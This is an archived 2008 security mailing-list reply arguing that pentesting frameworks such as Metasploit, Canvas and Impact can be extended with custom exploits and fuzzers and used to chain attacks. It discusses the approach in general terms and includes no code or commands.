Re: Pentesting tool - Commercial

From: Trygve Aasheim (trygve@pogostick.net)
Date: Tue Mar 04 2008 - 06:47:42 EST

• Next message: dcdave@att.net: "Re: Pentesting vs VA - was Pentesting tool - Commercial"
• Previous message: 11ack3r: "InfoSec certification EC/BackTrack?"
• In reply to: Andre Gironda: "Re: Pentesting tool - Commercial"
• Next in thread: Andre Gironda: "Re: Pentesting tool - Commercial"
• Reply: Andre Gironda: "Re: Pentesting tool - Commercial"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

>
> If these vulnerability assessment management and network
> penetration-testing tools were so important - how come they don't help
> a person create the next iPhone expoit, the next QuickTime exploit, or
> the almost certainly find the next Java JVM or Adobe Reader
> vulnerability?
>
>

Who says they don't?
Why can't you use metasploit, canvas or impact to help(!) you?

They are all open source, and you can freely add your own exploits,
payloads, macros or change existing ones.
So the results from your fuzzers can be implemented into modules in
these tools and tested.
The framework can then run the exploits for you continuously while you
test different configurations and version of the target software.

Also it helps if you are looking at exploiting an infrastructure more
than just running one exploit against one target.
Like HD Moore and Valsmith's speech at Black Hat 2007, where they showed
how to use the output from one module as input into another module - and
then achieve your goals.
(WPAD -> HASH -> login into Windows Domain example)

The same approach are used by malware developers now, and mpack is a
good example.
It's a framework built to carry different types of exploits, payloads
and perform different tasks.

We're also seeing more and more fuzzingtools being implemented directly
into these frameworks, like lorcon in Metasploit and the web attack
modules in Impact.
So then the tools can search for new vulnerabilities more than just act
on the pre-loaded exploits.

So I don't understand your limited view on these tools...
It's like asking "if this car is so damn good, why can't it drive me to
work...!?".

But that might be the difference here...you wanna exploit your iPhone,
while these tools are made to test the security level of company
infrastructures...

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

• Next message: dcdave@att.net: "Re: Pentesting vs VA - was Pentesting tool - Commercial"
• Previous message: 11ack3r: "InfoSec certification EC/BackTrack?"
• In reply to: Andre Gironda: "Re: Pentesting tool - Commercial"
• Next in thread: Andre Gironda: "Re: Pentesting tool - Commercial"
• Reply: Andre Gironda: "Re: Pentesting tool - Commercial"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:26 EDT